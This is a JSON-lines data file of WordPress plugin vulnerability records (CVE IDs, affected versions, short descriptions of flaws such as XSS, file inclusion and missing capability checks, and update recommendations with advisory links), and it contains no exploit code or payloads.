{"CVE_ID":"CVE-2024-5703","slug":"email-subscribers","versionImpact":"5.7.26","versionEndExcluding":"5.6.27","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized API access due to a missing capability check in all versions up to, and including, 5.7.26. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access the API (provided it is enabled) and add, edit, and delete audience users.","recommendation":"Update to version 5.6.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22283650-36bf-43e5-a57e-a91025fb2af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22283650-36bf-43e5-a57e-a91025fb2af7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118326\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118326\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5414","slug":"email-subscribers","versionImpact":"5.6.23","versionEndExcluding":"5.6.24","description":"The Icegram Express plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 5.6.23 via the show_es_logs function. This allows administrator-level attackers to read the contents of arbitrary files on the server, which can contain sensitive information including those belonging to other sites, for example in shared hosting environments.","recommendation":"Update to version 5.6.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417186ba-36ef-4d06-bbcd-e85eb9219689?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417186ba-36ef-4d06-bbcd-e85eb9219689?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-email-subscribers-logs.php?rev=2919465#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-email-subscribers-logs.php?rev=2919465#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977318%40email-subscribers%2Ftrunk&old=2972043%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977318%40email-subscribers%2Ftrunk&old=2972043%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-44589","slug":"miniorange-2-factor-authentication","versionEndExcluding":"5.6.2","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in miniOrange miniOrange's Google Authenticator \u2013 WordPress Two Factor Authentication \u2013 2FA , Two Factor, OTP SMS and Email | Passwordless login.This issue affects miniOrange's Google Authenticator \u2013 WordPress Two Factor Authentication \u2013 2FA , Two Factor, OTP SMS and Email | Passwordless login: from n\/a through 5.6.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-2-factor-authentication\\\/wordpress-miniorange-two-factor-authentication-plugin-5-6-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-2-factor-authentication\\\/wordpress-miniorange-two-factor-authentication-plugin-5-6-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3926","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.1","versionEndExcluding":"5.6.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom_attributes value in widgets in all versions up to, and including, 5.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f931cf8e-01dd-4f0b-ac86-6e0654fd1597?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f931cf8e-01dd-4f0b-ac86-6e0654fd1597?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.0\\\/modules\\\/creative-button\\\/widgets\\\/creative-button.php#L648\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.0\\\/modules\\\/creative-button\\\/widgets\\\/creative-button.php#L648\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3066178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3066178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28121","slug":"woocommerce-payments","versionEndExcluding":"5.6.2","description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.","refs":"[{\"url\":\"https:\\\/\\\/developer.woocommerce.com\\\/2023\\\/03\\\/23\\\/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know\\\/\",\"name\":\"https:\\\/\\\/developer.woocommerce.com\\\/2023\\\/03\\\/23\\\/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4482","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.1","versionEndExcluding":"5.6.2","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Countdown' widget in all versions up to, and including, 5.6.1 due to insufficient input sanitization and output escaping on user supplied 'text_days' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e42bf8-794e-46a5-b7db-f1f8802bba00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e42bf8-794e-46a5-b7db-f1f8802bba00?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.1\\\/modules\\\/widgets\\\/tp_countdown.php#L1945\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.1\\\/modules\\\/widgets\\\/tp_countdown.php#L1945\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Release Notes\"]}]"}
{"CVE_ID":"CVE-2024-12633","slug":"joomsport-sports-league-results-management","versionImpact":"5.6.17","versionEndExcluding":"5.6.18","description":"The JoomSport \u2013 for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page parameter in all versions up to, and including, 5.6.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209054\\\/joomsport-sports-league-results-management\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209054\\\/joomsport-sports-league-results-management\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4503e2c-0d0d-45de-a597-baace44a98a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4503e2c-0d0d-45de-a597-baace44a98a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5554","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.11","versionEndExcluding":"5.6.12","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018onclick_event\u2019 parameter in all versions up to, and including, 5.6.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/696c379a-c5a4-489f-8363-8aea9a4da814?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/696c379a-c5a4-489f-8363-8aea9a4da814?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.4\\\/modules\\\/step-flow\\\/widgets\\\/step-flow.php#L2287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.4\\\/modules\\\/step-flow\\\/widgets\\\/step-flow.php#L2287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110404\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110404\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8913","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.11","versionEndExcluding":"5.6.12","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.6.11 via the render function in modules\/widgets\/tp_accordion.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 5.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46126f88-416a-4430-8596-12f72cd2c1e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46126f88-416a-4430-8596-12f72cd2c1e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165763\\\/the-plus-addons-for-elementor-page-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165763\\\/the-plus-addons-for-elementor-page-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5551","slug":"wp-staging-pro","versionImpact":"5.6.0","versionEndExcluding":"5.6.1","description":"The WP STAGING Pro WordPress Backup Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.6.0. This is due to missing or incorrect nonce validation on the 'sub' parameter called from the WP STAGING WordPress Backup Plugin - Backup Duplicator & Migration plugin. This makes it possible for unauthenticated attackers to include any local files that end in '-settings.php' via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a99a21c-d4f1-4cdb-b1f1-31b3cf666b80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a99a21c-d4f1-4cdb-b1f1-31b3cf666b80?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-staging\\\/trunk\\\/Backend\\\/views\\\/settings\\\/tabs\\\/remote-storages.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-staging\\\/trunk\\\/Backend\\\/views\\\/settings\\\/tabs\\\/remote-storages.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wp-staging.com\\\/\",\"name\":\"https:\\\/\\\/wp-staging.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4983","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.0","versionEndExcluding":"5.6.1","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018video_color\u2019 parameter in all versions up to, and including, 5.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3f0a20b-d572-4040-b5b6-ede0aec4e2b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3f0a20b-d572-4040-b5b6-ede0aec4e2b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.3\\\/modules\\\/widgets\\\/tp_video_player.php#L1302\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.3\\\/modules\\\/widgets\\\/tp_video_player.php#L1302\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107776\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107776\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0691","slug":"filebird","versionImpact":"5.6.0","versionEndExcluding":"5.6.1","description":"The FileBird plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported folder titles in all versions up to, and including, 5.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It may also be possible to socially engineer an administrator into uploading a malicious folder import.","recommendation":"Update to version 5.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023924\\\/filebird\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023924\\\/filebird\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4466","slug":"ajax-load-more","versionEndExcluding":"5.6.0.3","description":"The WordPress Infinite Scroll WordPress plugin before 5.6.0.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/497d0bf9-b750-4293-9662-1722a74442e2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/497d0bf9-b750-4293-9662-1722a74442e2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5455","slug":"theplus_elementor_addon","versionImpact":"5.5.6","versionEndExcluding":"5.6.0","description":"The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.5.4 via the 'magazine_style' parameter within the Dynamic Smart Showcase widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8699142d-4ddd-4ca1-9886-9b2d905a36cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8699142d-4ddd-4ca1-9886-9b2d905a36cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"name\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5344","slug":"theplus_elementor_addon","versionImpact":"5.5.6","versionEndExcluding":"5.6.0","description":"The The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018forgoturl\u2019 attribute within the plugin's WP Login & Register widget in all versions up to, and including, 5.5.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac8fb0b-21a9-4b94-bb24-b349a7fe3305?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac8fb0b-21a9-4b94-bb24-b349a7fe3305?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"name\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6835","slug":"add-search-to-menu","versionImpact":"5.5.6","versionEndExcluding":"5.5.7","description":"The Ivory Search \u2013 WordPress Search Plugin plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.5.6 via the ajax_load_posts function. This makes it possible for unauthenticated attackers to extract text data from password-protected posts using the boolean-based attack on the AJAX search form","recommendation":"Update to version 5.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/013f7c26-8348-4c54-af61-473a720a5095?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/013f7c26-8348-4c54-af61-473a720a5095?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/class-is-ajax.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/class-is-ajax.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/partials\\\/is-ajax-results.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/partials\\\/is-ajax-results.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145289\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145289\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3233","slug":"add-search-to-menu","versionImpact":"5.5.5","versionEndExcluding":"5.5.6","description":"The Ivory Search \u2013 WordPress Search Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_create_index() function in all versions up to, and including, 5.5.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to trigger index creation.","recommendation":"Update to version 5.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9935d8-7790-457b-88bf-bee5e13b0f5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9935d8-7790-457b-88bf-bee5e13b0f5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3067568\\\/add-search-to-menu\\\/trunk\\\/includes\\\/class-is-index-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3067568\\\/add-search-to-menu\\\/trunk\\\/includes\\\/class-is-index-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5341","slug":"theplus_elementor_addon","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' attribute of the Heading Title widget in all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c8e951-8e8c-4a72-9ecf-1dd96392105d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c8e951-8e8c-4a72-9ecf-1dd96392105d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"name\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3704","slug":"pta-volunteer-sign-up-sheets","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DBAR Productions Volunteer Sign Up Sheets allows Stored XSS.This issue affects Volunteer Sign Up Sheets: from n\/a before 5.5.5.\n\nThe patch is available exclusively on GitHub at  https:\/\/github.com\/dbarproductions\/pta-volunteer-sign-up-sheets , as the vendor encounters difficulties using SVN to deploy to the WordPress.org repository.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/dbarproductions\\\/pta-volunteer-sign-up-sheets\\\/archive\\\/refs\\\/tags\\\/5.5.5.zip\",\"name\":\"https:\\\/\\\/github.com\\\/dbarproductions\\\/pta-volunteer-sign-up-sheets\\\/archive\\\/refs\\\/tags\\\/5.5.5.zip\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pta-volunteer-sign-up-sheets\\\/vulnerability\\\/wordpress-volunteer-sign-up-sheets-plugin-5-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/pta-volunteer-sign-up-sheets\\\/vulnerability\\\/wordpress-volunteer-sign-up-sheets-plugin-5-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3718","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's widgets all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b73402b-444c-47ad-9c05-7be6e6440123?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b73402b-444c-47ad-9c05-7be6e6440123?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_progress_bar.php#L1161\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_progress_bar.php#L1161\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_age_gate.php#L2304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_age_gate.php#L2304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_header_extras.php#L2757\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_header_extras.php#L2757\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_scroll_navigation.php#L1143\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_scroll_navigation.php#L1143\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2869\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_pricing_table.php#L2869\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_flip_box.php#L2349\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_flip_box.php#L2349\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_hovercard.php#L2648\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.4.2\\\/modules\\\/widgets\\\/tp_hovercard.php#L2648\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\